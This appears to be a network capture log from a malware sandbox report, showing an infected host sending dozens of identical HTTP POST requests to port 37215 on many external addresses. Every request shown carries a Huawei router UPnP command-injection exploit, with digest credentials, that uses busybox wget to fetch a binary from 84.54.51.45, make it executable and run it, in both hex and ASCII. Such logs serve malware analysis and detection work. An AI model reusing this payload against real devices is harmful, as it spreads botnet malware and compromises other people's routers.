                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1555192.168.2.155622441.77.39.21537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108459949 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1556192.168.2.155442441.172.75.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108474970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1557192.168.2.153724841.160.69.8337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108474970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1558192.168.2.154935641.51.245.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108474970 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1559192.168.2.154326641.246.237.24737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108496904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1560192.168.2.155355641.198.89.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108536959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1561192.168.2.153313441.119.32.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108546972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1562192.168.2.154399641.14.87.14837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108546972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1563192.168.2.154696841.144.217.14337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108546972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1564192.168.2.154011041.12.47.24337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108546972 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 